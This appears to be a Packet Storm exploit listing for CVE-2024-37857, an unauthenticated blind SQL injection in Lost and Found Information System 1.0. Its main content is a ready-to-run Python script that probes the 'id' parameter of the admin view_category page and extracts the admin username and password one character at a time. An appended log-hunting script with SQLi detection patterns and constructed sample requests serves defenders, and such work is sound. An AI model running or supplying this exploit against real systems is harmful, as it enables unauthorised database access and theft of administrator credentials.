Lost And Found Information System 1.0 SQL Injection

Lost and Found Information System version 1.0 suffers from an unauthenticated blind boolean-based remote SQL injection vulnerability.

Packet Storm
#sql #vulnerability #linux #apache #php #auth
```python
# Exploit Title: Unauthenticated Blind Boolean-Based SQL Injection Exploit - Lost and Found Information System
# Exploit Author: Amit Roy (Rezur / AR0x7)
# Date: June 07, 2024
# Vendor Homepage: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip
# Tested on: Kali Linux, Apache, Mysql
# Version: v1.0
# Exploit Description:
#   Lost and Found Information System v1.0 suffers from an unauthenticated SQL Injection Vulnerability allowing remote attackers to dump the SQL database using a Blind SQL Injection attack.
# CVE : CVE-2024-37857

import requests,string,sys,argparse

r = requests.Session()
proxies = {'http': 'http://127.0.0.1:8080'}
admin_path = "/php-lfis/admin/index.php"
createCategory_path = "/php-lfis/classes/Master.php"

def char_extract(rhost, payload):
    params = {"page": "categories/view_category", "id": payload}
    response = r.get(rhost+admin_path, params=params)
    if "Category ID is not valid" not in response.text:
        return True
    else:
        return False

def sqli(rhost, column):
    charset = string.printable
    output_length = 200
    output = ""
    for i in range(output_length):
        for char in charset:
            # Extracts the credentials of user with id=1, admin by default
            payload = "13371337' or char(%s) = (select substring(%s,%s,1) from users where id=1)-- -" % (ord(str(char)),str(column),str(i+1))
            sys.stdout.write(f"\r[*] Extracting: {output}\r")
            if char_extract(rhost, payload):
                output += char
                break
            elif char == '~' and not char_extract(rhost, payload):
                print("[*] Extracting:",output)
                return output

def argsetup():
    about  = 'Unauthenticated Blind Boolean-Based SQL Injection Exploit - Lost and Found Information System (https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html)'
    parser = argparse.ArgumentParser(description=about)
    parser.add_argument('-t', '--target', help='Target ip address or hostname. Example : "http://localhost"', required=True)
    args = parser.parse_args()
    return args

def main():
    args   = argsetup()
    rhost = args.target
    print(sqli(rhost, 'username'),':',sqli(rhost, 'password'))

if __name__ == "__main__":
    main()
```
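
For defenders, the request shape shown above (the `id` parameter of `page=categories/view_category` on `/php-lfis/admin/index.php`) can be hunted in web-server access logs. The following is an added example, not part of the original advisory: it assumes Apache common/combined log format and that legitimate category ids are plain integers, and the log lines, IP addresses and threshold are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Apache common/combined log prefix: client IP, then the quoted request line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')
# SQL fragments typical of boolean-based extraction, matched after URL decoding.
SQLI_RE = re.compile(r"'|--|\b(?:select|union|substring|char)\b", re.I)

def suspicious_id(target):
    """Return the decoded id value of a suspicious view_category request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/admin/index.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("page") != ["categories/view_category"]:
        return None
    value = qs.get("id", [""])[0]
    # Assumption: legitimate category ids are plain integers.
    if value.isdigit():
        return None
    return value if SQLI_RE.search(value) else None

def detect(lines, threshold=3):
    """Return {client_ip: count} for clients with >= threshold suspicious requests."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if m and suspicious_id(m.group(2)) is not None:
            hits[m.group(1)] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}

# Constructed sample log lines (not captured traffic; IPs are documentation ranges).
SAMPLE = [
    f'203.0.113.7 - - [07/Jun/2024:10:00:0{i} +0000] "GET /php-lfis/admin/index.php'
    f'?page=categories%2Fview_category&id=13371337%27+or+char%28{48 + i}%29+%3D+'
    '%28select+substring%28username%2C1%2C1%29+from+users+where+id%3D1%29--+- '
    'HTTP/1.1" 200 5120'
    for i in range(4)
] + [
    '198.51.100.20 - - [07/Jun/2024:10:01:00 +0000] "GET /php-lfis/admin/index.php'
    '?page=categories%2Fview_category&id=4 HTTP/1.1" 200 5300',
    '198.51.100.20 - - [07/Jun/2024:10:01:05 +0000] "GET /php-lfis/admin/index.php'
    '?page=categories HTTP/1.1" 200 4800',
]

if __name__ == "__main__":
    for ip, count in detect(SAMPLE).items():
        print(f"ALERT {ip}: {count} SQLi-shaped view_category requests")
```

Because the extraction is blind and boolean-based, every probe returns a normal page and status codes alone will not distinguish it; the signal is the volume of non-numeric `id` values from one client.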
